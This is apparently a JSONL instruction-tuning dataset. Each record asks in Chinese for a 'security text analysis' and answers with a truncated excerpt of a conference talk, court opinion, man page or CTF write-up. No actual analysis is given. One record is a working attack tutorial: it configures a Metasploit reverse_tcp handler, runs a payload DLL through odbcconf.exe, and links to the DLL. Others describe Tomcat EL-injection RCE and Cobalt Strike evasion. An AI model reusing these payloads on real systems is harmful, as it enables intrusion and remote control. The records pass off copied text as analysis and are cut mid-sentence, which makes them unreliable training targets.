INTRODUCTION: ACTIVE DIRECTORY  Main secrets storage of the domain  Stores password hashes of all accounts  In charge of authenticating accounts against domain resources  Authentication protocols  LDAP  NTLM  Kerberos  Common attacks  Golden & Silver Ticket  Forged PAC  PTT  PTH  NTLM Relay <RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019> NTLM Authentication is not bound to the session! (1) NTLM Negotiate (3) NTLM Authenticate (2) NTLM Challenge (4) NETLOGON (5) Approve/Reject Client Machine Server DC <RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019> NTLM RELAY (1) NTLM Negotiate (5) NTLM Authenticate (4) NTLM Challenge Client Machine Server Attacked Target DC <RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019> <RELAYING", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFOR PUBLICATION UNITED STATES COURT OF APPEALS FOR THE NINTH CIRCUIT  MDY INDUSTRIES, LLC, Plaintiff-counter-defendant- Appellant, v. No. 09-15932 BLIZZARD ENTERTAINMENT, INC. and VIVENDI GAMES, INC., D.C. No. Defendants-third-party-plaintiffs-  2:06-CV-02555- Appellees, DGC v. MICHAEL DONNELLY, Third-party-defendant-Appellant.   MDY INDUSTRIES, LLC, Plaintiff-counter-defendant- Appellee, v. No. 09-16044 BLIZZARD ENTERTAINMENT, INC. and D.C. No. VIVENDI GAMES, INC., 2:06-CV-02555-  Defendants-third-party-plaintiffs- DGC Appellants, OPINION v. MICHAEL DONNELLY, Third-party-defendant-Appellee.  Appeal from the United States District Court for the District of Arizona David G. Campbell, District Judge, Presiding 19979 Case: 09-16044 12/14/2010 Page: 1 of 47 ID: 7579806 DktEntry: 54-1 Argued and Submitted June 7, 2010Seattle, Washington Filed December 14, 2010 Before: William C. Canby, Jr., Consuelo M. Callahan and Sandra S. Ikuta, Circuit Judges. Opinion by Judge Callahan 19980 MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT Case: 09-16044 12/14/2010 Page: 2 of 47 ID: 7579806 DktEntry: 54-1 COUNSEL Lance C. Venable (argued) and Joseph R. Meaney of Ven- able, Campillo, Logan & Meaney, P.C., for plaintiff- 19984 MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT Case: 09-16044 12/14/2010 Page: 3 of 47 ID: 7579806 DktEntry: 54-1 appellant/cross-appellee MDY Industries LLC and plaintiff- appellant/third-party-defendant-appellee Michael Donnelly. Christian S. Genetski (argued), Shane M. McGee, and Jacob A. Sommer of Sonnenschein Nath & Rosenthal LLP, for defendants-appellees/cross-appellants Blizzard Entertainment, Inc. and Vivendi Games, Inc. George A. Riley, David R. Eberhart, and David S. Almeling of OMelveny & Myers LLP, for amicus curiae Business Software Alliance. Scott E. Bain, Keith Kupferschmid, and Mark Bohannon, for amicus curiae Software & Information Industry Association. Brian W. Carver of the University of California, Berkeley, School of Information, and Sherwin Siy and Jef Pe", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Copyright 1998 Andries E. Brouwer (aeb@cwi.nl) .\\\" .\\\" May be distributed under the GNU General Public License .\\\" Rewritten for 2.1.117, aeb, 981010. .\\\" .TH MKSWAP 8 \"25 March 1999\" \"Linux 2.2.4\" \"Linux Programmer's Manual\" .SH NAME mkswap \\- 建立一个linux交换区 .SH 总览 .BI \"mkswap [\\-c] [\\-v\" N \"] [\\-f] \" device \" [\" size \"]\" .SH 描述 .B mkswap 在一个设备上或者在一个文件里创建一个linux交换区 (该交换区创建后必须使用 .B swapon 命令来启用它通常交换区被列在 .I /etc/fstab 中从而使得在启动时可通过某些启动脚本中的 .B swapon -a 命令来启用) 参数 .I device 通常是一个磁盘分区类似于 .I /dev/hda4 或者 .IR /dev/sdb7 但也可以是一个文件 Linux内核不会着眼于分区号但是一些安装脚本会假定类型为 16进制的82(LINUX_SWAP)的分区意味着交换分区 参数 .I size 是多余的但为了向兼容性而被保留(它指定期望的以1024 字节为单位的交换区大小如果它未被指定 .B mkswap 将使用整个分区或者文件错误地使用\"-a\"选项将会损坏您的磁盘) Linux能理解两种类型的交换区旧类型和新类型交换区第一页的最后 10个字节区分两种类型旧类型以\"SWAP_SPACE\"新类型以\"SWAPSPACE2\" 作标识 在旧类型里第一页的其它部分是一个位图每一位指出交换区中的可 用页面因为第一页保存位图所以第一位为0同样的最后10位保存 标识所以如果页面大小为S旧类型交换区可以描述最多8*(S-10)-1 个可用于交换的页面对于S=4096象i386上最大可用区域是 133890048字节如果1 MB=220 bytes则差不多为128 MB而其他部 分将被浪费在alpha和sparc64上S=8192,最大可用区域是535560992字 节与上述同样条件下差不多为512 MB 因为零位表示坏的块或者超过交换区末尾的块旧的设置浪费了大部分的 位图页面一个简单的整数就可以满足指出交换区大小的需要而且如果 有坏的块也可以简单的列出来没有人想使用有许多坏块的交换区我 甚至不会使用包含一个坏块的交换空间在新类型交换区正好是这样做 的现在交换区的最大可用数目取决于具体结构大致来说在i386, PPC, m68k, ARM上为2GB在sparc上为1GB在mips上为512MB在alpha 上为128GB在sparc64上为3TB 注意在2.1.117内核之前每一页分配一个字节而现在为两个字节所 以为了获得2GB的可用交换区可能需要2MB的核心内存 目前Linux允许8个交换区这些正在使用的区域可从文件 .I /proc/swaps 从2.1.25起中查到 .B mkswap 不允许小于10个页面的区域 如果不知道您的机器所用的页面大小可以用\"cat /proc/cpuinfo\"来查 看或者不能查看 - 这个文件的内容取决于系统结构和内核版本 为了设置一个交换文件需要在执行 .B mkswap , 前创建这个文件例如象如下命令 .nf .RS # dd if=/dev/zero of=swapfile bs=1024 count=65536 .RE .fi 注意一个交换文件必须不包括任何空洞所以不能使用 .BR cp (1) 来创建该文件 .SH 选项 .TP .B \\-c 在创建交换区之前检查设备如果是块设备的坏块 如果发现任何坏块坏块的总数将被打印出来 .TP .B \\-f 强行向前执行即使该命令是愚蠢的该选项允许建立比 所在的文件或者分区还大的交换区在SPARC上强行创建 交换区无该选项的 .B mkswap 将拒绝在包含有效的SPARC超 级块的设备上创建vo交换区因为那样可能意味着将删除 分区表 .TP .B \\-v0 创建一个旧类型的交换区 .TP .B \\-v1 创建一个新类型的交换区 .LP 如果未指定-v选项而且交换区大小没有超过旧类型交换区 的最大值同时当前内核比2.1.117老且PAGE_SIZE小于 2048 .B mkswap 将默认创建旧类型的交换区万一您的引导分区或者磁盘卷 标在第一块新类型的头部将不接触那些部分所以可能更 好如果同样交换区较小 .SH \"参考\" .BR fdisk (8), .BR swapon", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Hacking Time (re, 200p, 180 solves) ### PL [ENG](#eng-version) > Were getting a transmission from someone in the past, find out what he wants. > [HackingTime.nes](HackingTime.nes) Pobieramy udostępniony plik, który okazuje się obrazem aplikacji na Nintendo Entertainment System, 8-bitową konsolę, którą każdy zna i lubi :). Zadanie polega na podaniu hasła, które jednocześnie będzie flagą w tym zadaniu. Zamiast statycznie analizować to zadanie, spróbujemy rozwiązać je \"na żywo\" w emulatorze FCEUX z jego zintegrowanym debuggerem. Krótka eksperymentacja pozwala nam stwierdzić, że sprawdzenie hasła oprócz zmiany samego bufora z hasłem w pamięci modyfikuje nam również bajty od offsetu `0x1e`. ![](./memory.png) Ustawiamy w takim razie read breakpoint na tym adresie i przy ponownej próbie sprawdzenia hasła trafiamy na następujący fragment: ```gas 00:8337:A0 00 LDY #$00 >00:8339:B9 1E 00 LDA $001E,Y @ $001E = #$80 00:833C:D0 08 BNE $8346 00:833E:C8 INY 00:833F:C0 18 CPY #$18 00:8341:D0 F6 BNE $8339 00:8343:A9 01 LDA #$01 00:8345:60 RTS ----------------------------------------- 00:8346:A9 00 LDA #$00 00:8348:60 RTS ----------------------------------------- ``` Jest to pętla, która sprawdza nam `0x18` znaków zaczynając od naszego offsetu `0x1e`. Jeżeli któryś z bajtów nie wynosi 0 to funkcja wychodzi z wartością 0, a w przeciwnym wypadku z 1. Bezpośrednia zmiana IP na instrukcję spod `0x8343` i wznowienie programu potwierdza nam komunikatem o sukcesie, że to jest celem zadania. Musimy zatem wprowadzić takie hasło by bajty spod offsetu `0x1e` wynosiły same zera. Możemy dokonać statycznej analizy albo literka po literce zbruteforce'ować nasze hasło (a to dzięki temu, że zmiana następnych liter nie zmienia nam bajtów poprzednich). Postanowiliśmy skorzystać z tej drugiej metody. Hasłem oraz flagą okazał się ciąg: `NOHACK4UXWRATHOFKFUHRERX`. Cała aplikacja jest oczywiście zabawnym nawiązaniem do filmu \"Kung Fury\" :)! ### ENG version > Were getting a transmission from someone in t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTicket to trouble MifareClassic, The Dutch Transportation Card and Access Control  From the Netherlands  Self proclaimed geek  First program at age 5  Focus on security, privacy  Journalist, trainer/consultant  Following Mifare Classic from day one  Wanna know more? Beer makes me talk! Everyone has the right to freedom of expression. This right shall include freedom to hold opinions and to receive and impart information and ideas without interference by public authority and regardless of frontiers. Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof; or abridging the freedom of speech, or of the press; or the right of the people peaceably to assemble, and to petition the Government for a redress of grievances. I got arrested for photographing a railway employee working on a Segway Cool guy!  Angel @ Chaos Communication Camp  Can you do introduction for the Mifare talk?  Security through obscurity doesnt work  Follow up with NXP  Publication January 2nd  Reader notices something interesting  January 11th: Paying with mobile, Shell Gas  January 17th: Rop Gonggrijp warning that security through obscurity doesnt work  February 13th: Gold-case  February 29th: TNO-research replace card in two years  No business case  February 29th:Attack plan has second study  March 3rd New hack pre-announced  March 10th Study published by Karsten Nohl  March 13th Nijmegen University cracks doors  March 17th MI-5 wants to spy on Brittons using the Oyster Card  March 20th Debate in parliament on door- issue  Open Source Security  Support for researchers  March 21st Dutch Secret Service says no interest in travel data (yet)  April 12th crack cards in seconds  April 14th new attack scenario  April 14th Contra Expertise - FOIA  April 16th Secretary of Transportation is responsible  April 22nd NXP announces Mifare Plus  April 29th Customer friendliness has to save card  Privacy is media issue  r.s.c.  June 5th  Conclusions altered, DoS, ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBehind the Scenes of the Badge by Joe Grand aka Kingpin Me. electrical engineer. hardware hacker. product designer. Retrospective: DEFCON 14 Retrospective: DEFCON 15 Retrospective: DEFCON 15 Retrospective: DEFCON 16 Retrospective: DEFCON 16 Retrospective: DEFCON 17 Retrospective: DEFCON 17 Badges by Christmas?  Fall 2009: Initial brainstorming (DT, Black Beetle, Neil)  January 2010: Preliminary design & parts selection  January: Prototype hardware design  February: Low-level firmware completed  February: Production design finalized  March: Production component orders  April-May: Finish firmware  June: Program microcontrollers (Avnet)  June-July: Badge fabrication, assembly & test (e-Teknet)  July: Badges shipped to DEFCON (on time!) Timeline Yeah right! The Development Process Picture Show Original sketch The Development Process Picture Show 2 Paper mock-up The Development Process Picture Show 3 Prototype hardware The Development Process Picture Show 4 Testing hardware The Development Process Picture Show 5 Writing low-level drivers The Development Process Picture Show 6 It works! The Development Process Picture Show 7 Final firmware development  0.040\" single-sided aluminum substrate PCB  Killer graphics by Neil, the DEFCON resident artist  Difficult to find a vendor that would take on this work  ...and do it for an affordable price  On aluminum? Yes. On circuit Board? No. Laser Engraving! Laser Engraving! 2 Laser Engraving! 3 Laser Engraving! 4 Early Block Diagram  Digital Signal Controller  Part of the 56800/E family  Main product page: http://tinyurl. com/mc56f8006-info/  Direct link to data sheet: www.freescale.com/ files/dsp/doc/data_sheet/MC56F8006.pdf Freescale MC56F8006  16KB of Flash  2KB of RAM  6-channel PWM  18-channel, 12-bit A/D  Timer/RTC  2 PGA, 3 analog comparators  Serial communication/UART/ I2C/SPI  Up to 22 GPIO  32-pin LQFP, 7mm x 7mm  1.8V-3.6V operation Freescale MC56F8006  128 x 32 pixels, 118 DPI  Reflective Cholesteric LCD  Bistable = no power or", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCyber [Crime|War] Connecting the dots Iftach Ian Amit Managing Partner, Security & Innovation Agenda Who am I? CyberWar [Attack | Defense] CyberCrime [Attack | Defense] Past events revisited... Connecting the dots Future Who Am I This is NOT going to be Picking up where we left off At least as far as last years research is concerned... Boss, is this supposed to be on the internet? I think this is from my powerpoint! We probably need to call someone... Finally de- classified... (public domain) The initial trace or lo- jack used (see rabbithole talk from 09) Hungry yet? This was just the appetizer... Question 1: What is this? Perceptions may be deceiving... War Crime Government / state Official backing Official resources Financing Expertise? Exploits/Vulns? War Crime Private semi-official backing (think organized crime) Official resources Self financing? Established expertise (in-house + outsourced) Market for exploits CyberWar Cyberwarfare, (also known as cyberwar and Cyber Warfare), is the use of computers and the Internet in conducting warfare in cyberspace. Wikipedia It did not happen yet being an exception? There is no Cyberwar Estonia This is not the only way! Neither is this... But civilian are always at stake! Many faces of how CyberWar is perceived... From McAfees Virtual Criminology Report 2009 Image caption: countries developing advanced offensive cyber capabilities Well focus on current players: US Russia China Israel Iran And no, here size does NOT matter... USA Thoroughly documented activity around cyberwar preparedness as well as military/government agencies with readily available offensive capabilities Massive recruiting of professional in attack/defense for different departments: USCC (United States Cyber Command - includes AirForce, Marines, Navy and Army service components) NSA Other TLAs... Russia GRU (Main Intelligence Directorate of the Russian Armed Forces) SVR (Foreign Intelligence Service) FSB (Federal Security Services) Center for Research of Mili", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDesperateCat 题环境 JDK8u311 Tomcat9.0.56 分析 先拿到这个源码我们看什么 看web.xml从这我们发现只有个类简简单单秒看完这个函数 不想贴代码了占地总结说来提供了个POST法这能让我们去上传任意件配 合部分的任意内容为什么是部分呢请看下 <servlet> <servlet-name>ExportServlet</servlet-name> <servlet-class>org.rwctf.servlets.ExportServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>ExportServlet</servlet-name> <url-pattern>/export</url-pattern> </servlet-mapping> 脏数据达咩并且这也规定了编码格式UTF-8所以也别想什么编码的trick了那接下来我 们很容易想到是不是可以通过标签去搞事情呢很遗憾不 这是单字符替换写的也没病所以咋也别想太多绕过jsp啥的这很明显就是让我们 el表达式了但是又来了新的问题el表达式要想执法怎么办我们知道执函数 法是需要 () 这也被过滤了 两个重要的Trick 这个后回到当然我不想去分析为什么el表达式这样可以有兴趣跟下源码 a[\"classes\"]等价于a.getclasses()它会去去调get开头的函数 同理我们也可以赋值 a[\"classes\"] = \"wsnd\";他会去通过set赋值 还有炒冷饭学起来Spring frameworkcve-2010-1622漏洞利指南 | 空虚浪的灵魂 (inbreak.net) 虽然不是靠这篇章就能解决但是我们也知道了利 el api 3.0 的赋值操作覆盖某些属性的 值可能导致rce接下来我们就来看看如何能让他rce呢 探索开始 String data = \"DIRTY DATA AT THE BEGINNING \" + content + \" DIRTY DATA AT THE END\"; this.writeBytesToFile(saveFile, data.getBytes(StandardCharsets.UTF_8)); 这我们需要到applicationScope先我们看看这都有些什么重要的属 性, ${applicationScope} 直接通过el是带out.write的便我们查看 这我们暂时只需要关注 org.apache.jasper.compiler.StringInterpreter 那么这 是什么呢 如何利org.apache.jasper.compiler.StringInterpreter 先我们需要知道这个org.apache.jasper.compiler.StringInterpreter到底是什么它是个接 那这个接是什么的呢可以看到它的描述 Defines the interface for the String interpreter. This allows users to provide custom String interpreter implementations that can optimise String processing for an application by performing code generation for a sub-set of Strings. 翻译过来就是定义了字符串解释器的接这允许户提供定义的字符串解释器实现通 过对字符串的集进代码成可以为应程序优化字符串处理很通俗易懂是吧好的 我们继续 另外在jsp的编译过程中在 org/apache/jasper/compiler/Generator.java 中他会执  getStringInterpreter 继续跟看看 这从ApplicationContext上下获取之后看到上那张图 createInstance 对这个获取到的类进实例化 这是部分调栈 那么如何让让jsp执上的编译呢很简单有两种式 1.初次启动tomcat的时候访问 2.若tomcat启动后我们只需要再往写个jsp访问即可 因此我们便很容易能想到接下来的操作通过第种式啦接下来我们只需要让 org.apache.jasper.compiler.StringInterpreter为我们的恶意类如何赋值也很简单通过 param.a 去去的get请求中的参数a的值简简单单绕过双引号即可或者cookie也姿势太多 此时我们只需要传 private static StringInterpreter createInstance(ServletContext context", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nQARK Who are we? APK structure Reversing APKs Components Communications Whats (still) wrong with Android? What is QARK? What QARK is not (yet) QARK motivation QARKs mission Under the hood What does QARK do? Tying it all together What else? Then what? What else? The fun part Demo time! Future plans Where to get QARK? Acknowledgements Contact Info", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n**注**请多喝点热水或者凉白开可预防**肾结石通风**等 痛风可伴发肥胖症高血压病糖尿病脂代谢紊乱等多种代谢性疾病 ### Odbcconf简介 ODBCCONF.exe是一个命令行工具允许配置ODBC驱动程序和数据源 微软官方文档 https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017 说明Odbcconf.exe所在路径已被系统添加PATH环境变量中因此Odbcconf命令可识别需注意x86x64位的Odbcconf调用 Windows 2003 默认位置 ```bash C:\\WINDOWS\\system32\\odbcconf.exe C:\\WINDOWS\\SysWOW64\\odbcconf.exe` Windows 7 默认位置 `C:\\Windows\\System32\\odbcconf.exe C:\\Windows\\SysWOW64\\odbcconf.exe ``` **攻击机** 192.168.1.4 Debian **靶机** 192.168.1.119 Windows 2003 192.168.1.5 Windows 7 ### 配置攻击机msf **注x86 payload** ```bash msf exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description     Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description     EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.1.4 yes The listen address (an interface may be specified) LPORT 53 yes The listen port Exploit target: Id Name   0 Wildcard Target msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.1.4:53 ``` ![](media/ba0e4d6c7b05eef6b8bcd5a730fb0c0b.jpg) ### 靶机执行Windows 2003 **注**文中为了更好的跨Windows 03--Windows 2016Odbcconf for dll采纯C重新编写 ![](media/df24184d409a2c0d09bbd18c511bc231.jpg) ```bash C:\\Windows\\SysWOW64\\odbcconf.exe /a {regsvr C:\\Micropoor_Odbcconf.dll} ``` **注x64** Odbcconf.exe ![](media/74bf5a42540b5298cffc72cfa8987743.jpg) ![](media/c8a788e729ff4969f70affe596b8f3a5.jpg) ### 附 Micropoor_Odbcconf.dll已测Windows 2003 x64 Windows 7 x64 **注** 功能reverse_tcp IP:192.168.1.4 PORT:53如有安全软件拦截因Micropoor加入特征 > 大小: 73216 字节 > 修改时间: 2019年1月19日, 21:29:11 > MD5: B31B971F01DE32EC5EC45746BF3DDAD2 > SHA1: CF42E4BF5A613992B7A563A522BBEBF1D0F06CCE CRC32: 28A1CE90 https://drive.google.com/open?id=1j12W7VOhv_-NdnZpFhWLwdt8sQwxdAsk > Micropoor", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIs This Your Pipe? Hijacking the Build Pipeline Last login: Aug 7 2011 from DEFCON 19 dc101$ whoami @rgbkrk dc101$  Last login: Aug 7 2011 from DEFCON 19 dc101$ whoami @rgbkrk dc101$ su greg dc101$ whoami @_GRRegg dc101$  Last login: Aug 7 2011 from DEFCON 19 dc101$ whoami @rgbkrk dc101$ su greg dc101$ whoami @_GRRegg dc101$ hostname @Rackspace dc101$  Build Pipeline Components  Source Control  Continuous Integration  Upstream Sources OSS, Builds and Testing Real Sites Need Secrets What secrets?   Managing Secrets Managing Secrets Not Credentials get leaked git add . Rich Mogull I did not completely scrub my code before posting to GitHub. I did not have billing alerts enabled ... This was a real mistake ... I paid the price for complacency. ec2-user@box:~$ ls cpuminer CudaMiner tor-0.2.4.20.tar.gz cuda_5.5.22_linux_64.run tor-0.2.4.20 ec2-user@box:~$ ls cpuminer CudaMiner tor-0.2.4.20.tar.gz cuda_5.5.22_linux_64.run tor-0.2.4.20 bit.ly/mogull Ref: bit.ly/awsinapk 07 40 00 e2 01 20 84 e2 02 27 82 e3 05 00 a0 e1 |.@... ...'......| 01 10 a0 e3 05 30 a0 e3 ae fd ff eb 00 00 50 e3 |.....0........P.| 2a ff ff 0a 09 00 a0 e3 10 d0 8d e2 f0 87 bd e8 |*...............| 1f 40 2d e9 4c 30 90 e5 03 00 a0 e3 04 20 93 e5 |.@-.L0....... ..| 0c 00 cd e5 02 24 a0 e1 04 20 8d e5 01 00 a0 e1 |.....$... ......| 07 20 d3 e5 04 10 8d e2 08 30 83 e2 08 30 8d e5 |. .......0...0..| 0d 20 cd e5 13 ff ff eb 14 d0 8d e2 00 80 bd e8 |. ..............| 41 4b 49 41 4a 35 4a 46 42 4d 53 5a 47 4d 37 58 |AKIAJ5JFBMSZGM7X| 33 4a 34 41 00 00 00 00 47 38 41 4b 70 7a 71 2b |3J4A....G8AKpzq+| 31 58 2b 64 65 4d 4f 74 72 63 6b 46 33 68 4a 79 |1X+deMOtrckF3hJy| 63 65 2f 32 30 75 46 63 68 70 33 35 48 69 49 65 |ce/20uFchp35HiIe| 00 00 00 00 2a b2 01 81 b0 b0 5f 84 00 00 00 00 |....*....._.....| a2 b2 01 81 b0 b0 af 01 00 00 00 00 3f 26 01 81 |............?&..| b0 b0 5f 84 00 00 00 00 78 ea ff 7f b0 b0 a8 80 |.._.....x.......| a0 ea ff 7f b0 b0 b0 80 30 eb ff 7f 01 00 00 00 |........0.......| 40 eb ff 7f b0 b0", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDiscover vulnerabilities with CodeQL Security Researcher @ CyCraft CHROOTs member Programming lover  qazbnm456 @boik_su Boik Su Agenda  Brief introduction to CodeQL  CodeQLs Tricks  Replicate CVEs to find you CVEs  More powerful pattern finder  Regression Tests  ClientDependency Massacre  Conclusion 3 Agenda  Brief introduction to CodeQL  CodeQLs Tricks  Replicate CVEs to find you CVEs  More powerful pattern finder  Regression Tests  ClientDependency Massacre  Conclusion 4 Brief introduction to CodeQL CodeQLs variant analysis and powerful analyzers 5 How Semmle QL works Analysis Overview Analyses  CodeQL ships with extensive libraries to empower variant analysis  Static Analysis  Data Flow Analysis  Taint Analysis  CFG Analysis  Supported languages include C/C++, C#, Java, Javascript, Python and more 7 Static Analysis  Find static things among the Snapshot Database  Fast and accurate to find flaws that dont require complex requirements to meet  Hardcoded password strings, dangerous functions, etc Static Analysis  from Method m where m.getName() = \"Execute\" select m  from VariableAccess va where va.getTarget().getName().regexpMatch(.*pass(wd|word|code).*) select va.getTarget() Static Analysis Data Flow Analysis  DataFlow node carries a single value due to the value-preserving flow  Find out how things flow back and forth among data nodes  Baby steps to discovering intriguing paths Data Flow Analysis  from AspNetRemoteFlowSource remote, Method m, MethodCall mc where m.getDeclaringType().getABaseType().hasQualifiedName(\"System.Web.IHttpHandler\") and m.isSourceDeclaration() and DataFlow::localFlow(remote, DataFlow::exprNode(mc.getAnArgument())) and mc.getEnclosingCallable() = m select m, mc Taint Analysis  DataFlow node carries a single value due to the value-preserving flow  Taint tracking extends data flow by including non-value-preserving flow steps  For example,  If x is a tainted string then y is also tainted Taint Analysis  class MyTaint extends TaintTracking::Configuration { ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# CyberTank Unsecured Network A network capture was attached. ## Authentication (25 points) > The CyberTank engineers build super-robust cars. Their website on the other hand appears to be using plain HTTP. Yikes! > > After capturing some unsecured communications you could even find the password to the employee area! > > Flag format: password Let's take a look at the network capture: ``` root@kali:/media/sf_CTFs/hackazon/CyberTank_Unsecured# tshark -r cybertank.pcap | head Running as user \"root\" and group \"root\". This could be dangerous. 1 0.000000 192.168.164.1  203.0.113.9 TCP 66 50242  80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM=1 50242 80 2 0.000092 203.0.113.9  192.168.164.1 TCP 66 80  50242 [SYN, ACK] Seq=0 Ack=1 Win=29200 Len=0 MSS=1460 SACK_PERM=1 WS=128 80 50242 3 0.000469 192.168.164.1  203.0.113.9 TCP 60 50242  80 [ACK] Seq=1 Ack=1 Win=1051136 Len=0 50242 80 4 0.002270 192.168.164.1  203.0.113.9 HTTP 509 GET /privacypolicy HTTP/1.1 50242 80 5 0.002328 203.0.113.9  192.168.164.1 TCP 54 80  50242 [ACK] Seq=1 Ack=456 Win=30336 Len=0 80 50242 6 0.002859 203.0.113.9  192.168.164.1 TCP 233 HTTP/1.1 200 OK [TCP segment of a reassembled PDU] 80 50242 7 0.002977 203.0.113.9  192.168.164.1 TCP 7354 80  50242 [ACK] Seq=180 Ack=456 Win=30336 Len=7300 [TCP segment of a reassembled PDU] 80 50242 8 0.003164 203.0.113.9  192.168.164.1 HTTP 1431 HTTP/1.1 200 OK (text/html) 80 50242 9 0.003738 192.168.164.1  203.0.113.9 TCP 60 50242  80 [ACK] Seq=456 Ack=8858 Win=1051136 Len=0 50242 80 10 0.005770 192.168.164.1  203.0.113.9 TCP 60 50242  80 [FIN, ACK] Seq=456 Ack=8858 Win=1051136 Len=0 50242 80 ``` The capture contained many HTTP streams, capturing an HTTP session. At some stage, the user asks for a page which requires authorization: ```console root@kali:/media/sf_CTFs/hackazon/CyberTank_Unsecured# tshark -r cybertank.pcap -qz follow,tcp,ascii,20 Running as user \"root\" and group \"root\". This could be dangerous. =================================================", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRed Team Ops with CS: Operations 0x00 前言 CS的作者Raphael Mudge有2套公开视频非常值得学习一个是18年的In-memory Evasion一 个是19年的Red Team Operations with Cobalt Strike前段时间再次观看了In-memory Evasion并作了相应笔记而Red Team Operations with Cobalt Strike始终没有完整的看过一 遍正好这次一口气搞完学习一定要做笔记能写出工具的一定要写成工具 Red Team Operations with Cobalt Strike这个课程分为了9个部分分别是 Operations运营 Infrastructure基础设施 C2命令和控制 Weaponization武器化构建 Initial Access初始化权限获取 Post Exploitation后利用 Privilege Escalation权限提升 Lateral Movement横向移动 Pivoting中转 在第一部分运营中作者先介绍了以邮件钓鱼为例子的整个攻击链和攻击链上防御手段然后讲解了逃 逸思想最后是解释了一些CS的运营相关的知识 0x01 攻击链以及相应防御手段 作者以邮件投递钓鱼为例讲解整个攻击链邮件钓鱼一直是APT中最常见的初始化权限获取手法以此 为例非常合适下图是我整理的整个攻击链以及相应防御手段 真的是一路过关斩将太不容易了恶意邮件投递会经过以下防御手段 如果你DMARCDKIMSPF等邮件发送服务器没有配置好很有可能被反垃圾邮件和反钓鱼邮件 过滤自动拦截 mail antivirus gateway or sandbox沙箱技术会自动打开你的附件或者访问邮件中的url然后判 断是否是恶意 当邮件附件落地后会有各式各样的终端安全产品A/V来一波静态的和简单的动态分析 如果主机上有应用白名单策略你这个来源不明的可执行程序还需要绕过应用白名单策略用什么 白加黑之类的手法 植入体执行起来会有各种进程线程内存操作然后反病毒产品各种EDR就开始记录你的相关 行为稍微不注意就触发恶意规则然后被拦截上报 过了这一关接下来就是出网问题防火墙策略代理上网域名分类域名白名单等等限制C2出 网 Produced by AttackTeamFamily - Author: L.N. - Date: 2021-09-28 No. 1 / 5 - Welcome to www.red-team.cn 同时网络监控设备一直分析监控流量稍微流量异常就可能触发告警 即使过了这一次威胁情报对域名和IP样本等分析例如C2的TeamServer被全网测绘识别了 导致IP被标记 植入体正常启动运行并回连以后就是后利用了例如横向移动截屏键盘记录本机信息收 集网络信息收集等等每一个行为都可能被EDR做侦测被EDR云端的机器学习人工分析给标 记为恶意 要完成一次成功的红队行动前期既要完整的bypass所有防御后期还要思考驻留办法防止被云端分 析样本存活时间太短 0x02 逃逸哲学 作者讲到这个部分的时候非常有共鸣他有一下观点 CS不是一个魔法棒不可能对抗你所遇到的所有防御和场景 但是CS提供了选择+扩展 如何成功逃逸Evasion 理解你所使用的工具和它产生的行为知己 评估和理解防御机制知彼 做出一个最好的选择然后执行评估执行 通过如果成功逃逸这3点总结其实就是一个红队人员的成长路径先学会理解使用各种攻击工具然 后学习理解防御机制再修改攻击方法bypass防御机制最后在知己知彼以后做出一个最佳选择红队 行动就是在不停的重复了解目标选择攻击方法抉择并执行攻击方法的过程中完成的 0x03 CS运营相关知识 CS的使命和愿景 使命弥补渗透测试工具和高级威胁恶意软件之间的差距 愿景有用的可信的对手模拟工具 培育身经百战的安全分析师 驱动客观的有意义的安全提升 Produced by AttackTeamFamily - Author: L.N. - Date: 2021-09-28 No. 2 / 5 - Welcome to www.red-team.cn 培训安全专业人才和高级威胁策略的决策者 分散操作 作者分享了一些最佳实践用多个TeamServer做功能分离 作者建议最好分开搭建3个TeamServer用作不同目的: Staging 用作初始化权限时候的Teamserver可能你是钓鱼或者其他方式获取的初始化权限你会在 上面使用提权或者横向移动等等操作由于你开始对目标环境不是很熟悉难免会触发告警 这个teamserver被发现的可能基本上是100%因此在被发现之前尽快横向移动到其他机器 然后建立long haul的Teamserver也就是我", "category": "text_analysis", "source": "security_papers"}
